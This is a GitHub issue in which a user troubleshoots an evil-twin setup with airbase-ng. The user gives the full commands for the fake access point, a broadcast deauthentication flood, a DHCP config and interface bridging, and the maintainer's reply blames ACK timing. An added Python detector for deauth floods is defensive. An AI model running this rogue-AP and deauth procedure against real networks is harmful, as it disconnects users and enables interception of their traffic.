This repository has been archived by the owner on Mar 11, 2018. It is now read-only.

Can't Get My Experimental PC to Connect to the AP using airbase-ng #158

asciiterminal opened this issue Jan 26, 2018 · 1 comment

@asciiterminal

I have been working around the Evil Twin Airbase-ng for quite a while and I am unable to get my victim PC, which is my other Windows 10 machine, to connect. It did connect to the AP once, and when it did it had no internet connection, which has kept me up for some time. I am going to post the process I have performed; please go through it and guide me through the issue.

Note: I have tried iptables and echo 1; it didn't help.

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode
airmon-ng start wlan0

Checking for background processes that can interfere with the work
airmon-ng check wlan0mon (assigned new name)

Setting up the Fake AP
airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon
17:19:25 Created tap interface at0
17:19:25 Trying to set MTU on at0 to 1500
17:19:25 Trying to set MTU on wlan0mon to 1800
17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started.
17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"
17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon
17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server
apt-get install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
isc-dhcp-server is already the newest version (4.3.5-3+b1).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuring nano /etc/dhcp/dhcpd.conf

authoritative;
subnet 192.168.1.0 netmask 255.255.255.0
{

option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.10 192.168.1.200;
default-lease-time 600;
max-lease-time 7200;

}

Installing bridging utilities

apt-get install bridge-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.5-14).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface
root@kali:~# brctl addbr evil \Name of the bridge i made
root@kali:~# brctl addif evil eth0 \my ethernet connection
root@kali:~# brctl addif evil at0
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# ifconfig evil up

Starting DHCP server
root@kali:~# systemctl start smbd.service
root@kali:~# dhclient evil

root@kali:~# service isc-dhcp-server restart
root@kali:~# service isc-dhcp-server status
● isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago
Docs: man:systemd-sysv-generator(8)
Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 4915)
CGroup: /system.slice/isc-dhcp-server.service
└─2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd[1]: Starting LSB: DHCP server...
Dec 06 17:32:33 kali isc-dhcp-server[2049]: Launching IPv4 server only.
Dec 06 17:32:33 kali dhcpd[2060]: Wrote 11 leases to leases file.
Dec 06 17:32:33 kali dhcpd[2060]: Multiple interfaces match the same subnet: eth0 evil
Dec 06 17:32:33 kali dhcpd[2060]: Multiple interfaces match the same shared network: eth0 evil
Dec 06 17:32:33 kali dhcpd[2061]: Server starting service.
Dec 06 17:32:35 kali isc-dhcp-server[2049]: Starting ISC DHCPv4 server: dhcpd.
Dec 06 17:32:35 kali systemd[1]: Started LSB: DHCP server.

/etc/init.d/isc-dhcp-server start
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

I have tried the method explained here, and yet either I can't connect to the Fake AP or, when I do, there is no internet.

@aircrack-ng
Owner

It is due to ACK timing. Software is not fast enough to do it. A different type of monitor interface needs to be used; airbase-ng needs to be changed to handle that.
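
On the monitoring side, the setup in the issue above leaves two observable artifacts: a steady stream of broadcast deauthentication frames (two per second in the aireplay-ng output) and a BSSID whose locally-administered bit is set. The Python below is an added example, not part of the original issue or of the aircrack-ng project; the frame-tuple layout, the window and the threshold are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"


def is_locally_administered(mac: str) -> bool:
    """True when the U/L bit (0x02 of the first octet) is set, meaning the
    address was assigned in software. Weak signal on its own: virtual SSIDs
    and randomised client MACs also set this bit."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def broadcast_deauth_floods(frames, window=5.0, threshold=8):
    """Return {bssid: time_of_first_alert} for every BSSID whose broadcast
    deauthentication frames reach `threshold` within `window` seconds.

    `frames` is an iterable of (timestamp_s, subtype, bssid, destination)
    tuples; this layout is an assumption of the example, not a capture format.
    """
    recent = defaultdict(deque)   # bssid -> timestamps inside the window
    alerts = {}
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype != "deauth" or dst.lower() != BROADCAST:
            continue              # unicast deauths and other frames are ignored
        key = bssid.lower()
        seen = recent[key]
        seen.append(ts)
        while seen and ts - seen[0] > window:
            seen.popleft()        # drop frames that fell out of the window
        if len(seen) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts


# Constructed sample: nine broadcast deauths at 0.5 s spacing, mirroring the
# rate in the issue's log, plus one ordinary unicast deauth from another AP.
SAMPLE = [(i * 0.5, "deauth", "72:02:71:73:0D:B6", BROADCAST) for i in range(9)]
SAMPLE.append((3.0, "deauth", "00:11:22:33:44:55", "20:16:d8:f4:0d:98"))

if __name__ == "__main__":
    for bssid, when in broadcast_deauth_floods(SAMPLE).items():
        flag = "locally administered" if is_locally_administered(bssid) else "vendor OUI"
        print(f"broadcast deauth flood from {bssid} at t={when}s ({flag})")
```
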
